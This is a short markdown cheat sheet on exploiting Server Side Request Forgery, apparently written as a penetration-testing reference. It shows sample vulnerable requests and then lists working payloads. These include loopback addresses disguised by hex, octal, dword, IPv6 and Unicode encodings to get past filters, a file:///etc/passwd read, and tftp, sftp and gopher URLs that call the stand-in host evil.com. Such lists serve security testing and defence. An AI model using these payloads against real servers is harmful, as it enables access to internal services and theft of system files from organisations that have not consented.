# Server Side Request Forgery (SSRF) ## Introduction Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server ## Where to find Usually it can be found in the request that contain request to another url, for example like this ``` POST /api/check/products HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded Origin: https://example.com Referer: https://example.com urlApi=http://192.168.1.1%2fapi%2f&id=1 ``` or ``` GET /image?url=http://192.168.1.1/ Host: example.com ``` ## How to exploit 1. Basic payload ``` http://127.0.0.1:1337 http://localhost:1337 ``` 2. Hex encoding ``` http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1 ``` 3. Octal encoding ``` http://127.0.0.1 -> http://0177.0.0.01 ``` 4. Dword encoding ``` http://127.0.0.1 -> http://2130706433 ``` 5. Mixed encoding ``` http://127.0.0.1 -> http://0177.0.0.0x1 ``` 6. Using URL encoding ``` http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74 ``` 7. Using IPv6 ``` http://0000::1:1337/ http://[::]:1337/ ``` 8. Using bubble text ``` http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ Use this https://capitalizemytitle.com/bubble-text-generator/ ``` ## How to exploit (URI Scheme) 1. File scheme ``` file:///etc/passwd ``` 2. Dict scheme ``` dict://127.0.0.1:1337/ ``` 3. FTP scheme ``` ftp://127.0.0.1/ ``` 4. TFTP scheme ``` tftp://evil.com:1337/test ``` 5. SFTP scheme ``` sftp://evil.com:1337/test ``` 6. LDAP scheme ``` ldap://127.0.0.1:1337/ ``` 7. Gopher scheme ``` gopher://evil.com/_Test%0ASSRF ``` ## References * [Vickie Li](https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b)